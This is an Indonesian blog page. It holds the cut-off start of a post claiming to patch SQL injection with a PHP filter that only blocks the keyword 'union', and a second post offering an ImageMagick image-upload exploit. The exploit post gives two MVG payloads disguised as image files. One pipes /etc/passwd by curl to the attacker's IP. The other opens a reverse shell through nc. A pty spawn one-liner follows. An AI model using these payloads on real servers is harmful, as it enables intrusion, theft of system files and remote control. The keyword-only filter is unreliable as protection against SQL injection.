Skip to main content

Posts

Cara Patch Bug Sql Injection Agar Terhindar Serangan Hacker

Setelah lama ga ngeblog karena kesibukan didunia nyata, dan mumpung agak selo pada kesempatan kali ini gw mau berbagi tutorial Cara Patch Bug Sql Injection  biar website aman dari serangan  Hacker Kalian tau apa itu  Sql Injection?  agar kalian paham, mari kita bahas sedikit penjelasan tentang sql injection. Sql Injection  adalah suatu teknik hacking yang digunakan oleh penyerang/attacker untuk mendapatkan sebuah database dengan menyisipkan perintah-perintah  Sqli  melalui url yang memanfaatkan bug yang disebabkan oleh kesalahan coding atau kurang pemfilteran pada variabel tersebut. Oke demikian sedikit penjelasan mengenai Sql Injection. Selanjutnya mari kita simak ketutorial cara mempatch bug sql injectionnya. Yang pertama, buka text editor, notepad++, dll atau apalah sesuai kesukaan kalian, lalu copy script dibawah ini. <? if (ereg("%20union%20", $_ GET['id'])||ereg("union",$_ GET['id']) || ereg("\*union\*",$_ GET[...
Recent posts

hack file upload pake jpg,png dan mvg

cek server save ke file jpg,png atau gif push graphic-context viewbox 0 0 640 480 fill 'url(https://127.0.0.0/oops.jpg"; cat /etc/passwd | curl -d @ http://(ip kamu):9700;touch "hello)' pop graphic-context  save ke file mvg ush graphic-context viewbox 0 0 640 480 fill 'url(https://127.0.0.0/oops.jpg"; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc (ip kamu) 31337 >/tmp/f;touch "hello)' pop graphic-context siapkan nc sudah dalam posisi listening Agar lebih interaktif, shell bash perlu kamu spawn dengan perintah:   python -c 'import pty; pty.spawn("/bin/bash")' . terima kasih sekedar untuk menyimpan data